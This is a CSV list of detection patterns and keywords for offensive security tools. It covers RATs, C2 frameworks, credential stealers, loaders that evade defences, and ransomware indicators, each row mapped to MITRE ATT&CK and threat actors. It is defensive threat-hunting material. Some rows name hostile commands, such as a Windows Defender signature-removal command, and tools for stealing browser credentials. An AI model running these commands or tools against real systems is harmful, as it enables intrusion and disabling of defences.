"*monkey\infection_monkey*",".{0,1000}monkey\\infection_monkey.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","0","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","52262"
"*monkey_island.exe*",".{0,1000}monkey_island\.exe.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","52263"
"*monkey32.exe *",".{0,1000}monkey32\.exe\s.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","0","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","52264"
"*monkey64.exe *",".{0,1000}monkey64\.exe\s.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","0","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","52265"
"*monkey-linux-32*",".{0,1000}monkey\-linux\-32.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","#linux","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","52266"
"*monkey-linux-64*",".{0,1000}monkey\-linux\-64.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","#linux","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","52267"
"*monkey-windows-32.exe*",".{0,1000}monkey\-windows\-32\.exe.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","52268"
"*monkey-windows-64.exe*",".{0,1000}monkey\-windows\-64\.exe.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","52269"
"*monoxgas/Koppeling*",".{0,1000}monoxgas\/Koppeling.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","1","N/A","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","52270"
"*monoxgas/sRDI*",".{0,1000}monoxgas\/sRDI.{0,1000}","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1620 - T1055.001 - T1059.004 - T1027 - T1105","TA0005 - TA0004 - TA0002","N/A","N/A","Resource Development","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","N/A","10","2262","473","2023-11-15T10:53:00Z","2017-07-28T19:30:53Z","52271"
"*monti5o7lvyrpyk26lqofnfvajtyqruwatlfaazgm3zskt3xiktudwid.onion*",".{0,1000}monti5o7lvyrpyk26lqofnfvajtyqruwatlfaazgm3zskt3xiktudwid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","52272"
"*moom825/Discord-RAT-2.0*",".{0,1000}moom825\/Discord\-RAT\-2\.0.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","1","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","52273"
"*moom825/xeno-rat*",".{0,1000}moom825\/xeno\-rat.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","52274"
"*moonD4rk/HackBrowserData*",".{0,1000}moonD4rk\/HackBrowserData.{0,1000}","offensive_tool_keyword","cobaltstrike","C# binary with embeded golang hack-browser-data","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData","1","1","N/A","N/A","10","10","96","17","2021-12-09T18:58:27Z","2020-12-06T12:28:47Z","52275"
"*moonD4rk/HackBrowserData*",".{0,1000}moonD4rk\/HackBrowserData.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","52276"
"*moonwalk finish*",".{0,1000}moonwalk\sfinish.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","#linux","N/A","10","10","1440","129","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z","52277"
"*moonwalk get *history*",".{0,1000}moonwalk\sget\s.{0,1000}history.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","#linux","N/A","10","10","1440","129","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z","52278"
"*moonwalk start*",".{0,1000}moonwalk\sstart.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","#linux","N/A","10","10","1440","129","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z","52279"
"*moremo123123@cock.li*",".{0,1000}moremo123123\@cock\.li.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","52280"
"*morphHTA*",".{0,1000}morphHTA.{0,1000}","offensive_tool_keyword","morphHTA","morphHTA - Morphing Cobalt Strikes evil.HTA payload generator","T1059.007 - T1027.002 - T1564.001 - T1547.001","TA0002 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vysecurity/morphHTA","1","1","N/A","N/A","N/A","6","522","130","2023-04-14T19:15:57Z","2017-02-24T11:27:00Z","52281"
"*mortar-loader.html*",".{0,1000}mortar\-loader\.html.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","N/A","10","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","52282"
"*mortar-main.zip*",".{0,1000}mortar\-main\.zip.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","N/A","10","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","52283"
"*mosajjal/dnspot*",".{0,1000}mosajjal\/dnspot.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","1","N/A","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","52284"
"*mosquitto2john.py*",".{0,1000}mosquitto2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","52285"
"*MotdPersistence*",".{0,1000}MotdPersistence.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","52286"
"*Mount-VolumeShadowCopy*",".{0,1000}Mount\-VolumeShadowCopy.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","52287"
"*mousejack*",".{0,1000}mousejack.{0,1000}","offensive_tool_keyword","mousejack","MouseJack device discovery and research tools","T1179 - T1059 - T1065 - T1057","TA0011 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/BastilleResearch/mousejack","1","1","N/A","N/A","10","10","1329","261","2017-12-19T10:16:25Z","2016-02-23T14:19:38Z","52288"
"*Mouselogger.ps1*",".{0,1000}Mouselogger\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","52289"
"*mouseshaker.*",".{0,1000}mouseshaker\..{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","52290"
"*MoveKit-master.zip*",".{0,1000}MoveKit\-master\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","N/A","10","7","666","109","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z","52292"
"*move-msbuild * http move.csproj*",".{0,1000}move\-msbuild\s.{0,1000}\shttp\smove\.csproj.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","0","N/A","N/A","10","7","666","109","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z","52293"
"*move-pre-custom-file *.exe *",".{0,1000}move\-pre\-custom\-file\s.{0,1000}\.exe\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","0","N/A","N/A","10","7","666","109","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z","52294"
"*movfuscator*",".{0,1000}movfuscator.{0,1000}","offensive_tool_keyword","movfuscator","The M/o/Vfuscator (short 'o. sounds like mobfuscator) compiles programs into mov instructions. and only mov instructions. Arithmetic. comparisons. jumps. function calls. and everything else a program needs are all performed through mov operations. there is no self-modifying code. no transport-triggered calculation. and no other form of non-mov cheating","T1057 - T1027 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/xoreaxeaxeax/movfuscator","1","0","N/A","N/A","N/A","10","9766","405","2024-05-29T18:29:10Z","2015-06-16T01:49:40Z","52295"
"*Moziedx765lla Firefedx765ox*",".{0,1000}Moziedx765lla\sFirefedx765ox.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","52296"
"*Mozilla/5.0 (*-bit) dnstwist*",".{0,1000}Mozilla\/5\.0\s\(.{0,1000}\-bit\)\sdnstwist.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","1","#useragent","N/A","3","10","5113","801","2025-04-15T18:41:47Z","2015-06-11T12:24:17Z","52297"
"*Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like TsunamiWave*",".{0,1000}Mozilla\/5\.0\s\(compatible,\sMSIE\s11,\sWindows\sNT\s6\.3\;\sTrident\/7\.0\;\srv\:11\.0\)\slike\sTsunamiWave.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","1","#useragent","user-agent","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","52298"
"*Mozilla/5.0 (compatible; ArgusBot/1.0*",".{0,1000}Mozilla\/5\.0\s\(compatible\;\sArgusBot\/1\.0.{0,1000}","offensive_tool_keyword","Argus","Information Gathering Toolkit","T1590.001 - T1590.002 - T1595.003 - T1016 - T1046 - T1590.005","TA0043 - TA0007","N/A","N/A","Reconnaissance","https://github.com/jasonxtn/Argus","1","0","#useragent","N/A","4","10","1951","210","2024-10-08T19:04:27Z","2024-10-01T22:13:51Z","52299"
"*Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 10.0; WOW64; Trident/7.0; Specula; Microsoft Outlook*",".{0,1000}Mozilla\/5\.0\s\(compatible\;\sMSIE\s10\.0\;\sWindows\sNT\s10\.0\;\sWOW64\;\sTrident\/7\.0\;\sSpecula\;\sMicrosoft\sOutlook.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","1","#useragent","default UA template","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","52300"
"*Mozilla/6.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36*",".{0,1000}Mozilla\/6\.0\s\(Windows\sNT\s10\.0\;\sWin64\;\sx64\)\sAppleWebKit\/537\.36\s\(KHTML,\slike\sGecko\)\sChrome\/103\.0\.0\.0\sSafari\/537\.36.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005  - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","1","#useragent","malicious user agent used by graphstrike server (not a real one)","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","52302"
"*mozilla2john.py*",".{0,1000}mozilla2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","52303"
"*mozlz4-win32.exe*",".{0,1000}mozlz4\-win32\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","52304"
"*mozlz4-win32.exe*",".{0,1000}mozlz4\-win32\.exe.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","52305"
"*MpCmdRun.exe -RemoveDefinitions -All*",".{0,1000}MpCmdRun\.exe\s\-RemoveDefinitions\s\-All.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","52308"
"*MpCmdRun.exe* -RemoveDefinitions -All*",".{0,1000}MpCmdRun\.exe.{0,1000}\s\-RemoveDefinitions\s\-All.{0,1000}","offensive_tool_keyword","MpCmdRun","Removing all the signature from windows defender - used by a metasploit module","T1562.001","TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","52310"
"*mpgn/BackupOperatorToDA*",".{0,1000}mpgn\/BackupOperatorToDA.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","N/A","10","5","421","53","2025-01-04T14:16:46Z","2022-02-15T20:51:46Z","52312"
"*mqtt_check.py*",".{0,1000}mqtt_check\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","52313"
"*mr.un1k0d3r@gmail.com*",".{0,1000}mr\.un1k0d3r\@gmail\.com.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","LockBit","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","#email","N/A","10","10","779","223","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z","52314"
